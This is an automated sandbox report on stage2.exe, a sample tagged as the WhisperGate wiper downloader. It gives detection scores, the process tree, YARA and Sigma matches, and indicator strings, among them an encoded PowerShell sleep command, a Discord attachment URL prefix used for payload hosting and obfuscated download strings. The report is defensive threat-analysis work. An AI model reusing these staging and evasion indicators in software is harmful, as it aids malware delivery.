
Windows Analysis Report stage2.exe

Overview

General Information

Sample Name: stage2.exe
Analysis ID: 553986
MD5: 14c8482f302b5e81e3fa1b18a509289d
SHA1: 16525cb2fd86dce842107eb1ba6174b23f188537
SHA256: dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags: DEV-0586, exe, WhisperGate

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MSILDownloaderGeneric
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Execution of Powershell with Base64
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • stage2.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\stage2.exe" MD5: 14C8482F302B5E81E3FA1B18A509289D)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
stage2.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
  • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
stage2.exe | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3cc8:$s1: xownxloxadDxatxxax
  • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
  • 0x8194:$s4: fffxfff.fff
  • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
stage2.exe | MAL_Unknown_Discord_Characteristics_Jan22_1 | Detects unknown malware with a few indicators also found in Wiper malware | Florian Roth
  • 0x3cc8:$x1: xownxloxadDxatxxax
  • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
Process Memory Space: stage2.exe PID: 7084 | JoeSecurity_MSIL_Downloader_Generic | Yara detected MSIL_Downloader_Generic | Joe Security

    Unpacked PEs

    Source | Rule | Description | Author | Strings
    1.2.stage2.exe.ea0000.0.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.2.stage2.exe.ea0000.0.unpack | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    1.2.stage2.exe.ea0000.0.unpack | MAL_Unknown_Discord_Characteristics_Jan22_1 | Detects unknown malware with a few indicators also found in Wiper malware | Florian Roth
    • 0x3cc8:$x1: xownxloxadDxatxxax
    • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpack | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61

    Sigma Overview

    System Summary:

    Sigma detected: Suspicious Encoded PowerShell Command Line
    Source: Process started, Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Suspicious Execution of Powershell with Base64
    Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Non Interactive PowerShell
    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: T1086 PowerShell Execution
    Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132868886483971359.7160.DefaultAppDomain.powershell

    Jbx Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: stage2.exe, Virustotal: Detection: 44%
    Source: stage2.exe, ReversingLabs: Detection: 48%
    Machine Learning detection for sample
    Source: stage2.exe, Joe Sandbox ML: detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 13_2_07A341F0 CryptReleaseContext,
    Source: stage2.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: unknown, HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
    Source: stage2.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
